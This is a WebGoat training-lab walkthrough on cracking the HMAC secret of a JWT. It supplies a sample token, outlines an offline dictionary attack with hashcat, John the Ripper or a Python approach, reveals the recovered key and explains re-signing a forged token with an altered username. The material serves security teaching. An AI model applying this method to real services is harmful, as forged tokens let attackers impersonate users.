JWT Tokens (5)
JWT cracking
With the HMAC with SHA-2 Functions you use a secret key to sign and verify the token. Once we figure out this key we can create a new token and sign it. So it is very important the key is strong enough so a brute force or dictionary attack is not feasible. Once you have a token you can start an offline brute force or dictionary attack.
Assignment
Given we have the following token try to find out secret key and submit a new key with the username changed to WebGoat.
eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTU5MDczNTQ3NiwiZXhwIjoxNTkwNzM1NTM2LCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.28VXP4trt_uDrKM7Dn10ZotOhYoOhJy3dL-xu5boKzc
Solution
💡 Save the token and try to verify the token locally 💡 Download a word list dictionary (https://github.com/first20hours/google-10000-english) 💡 Write a small program or use HashCat for brute forcing the token according the word list
It is possible to validate this challenge with tools like johntheripper and https://jwt.io/, but in order to get a better understanding of the whole process, here a Python script.
Isolate the signature, and reformat it correctly.
Use each word of the dictionary as a key, calculate the HMAC of the initial message, convert it to base64, and compare it with the signature.
If there is a match, the dictionary word is the key used (value found : victory).
Then calculate the new signature with the modified message
Last updated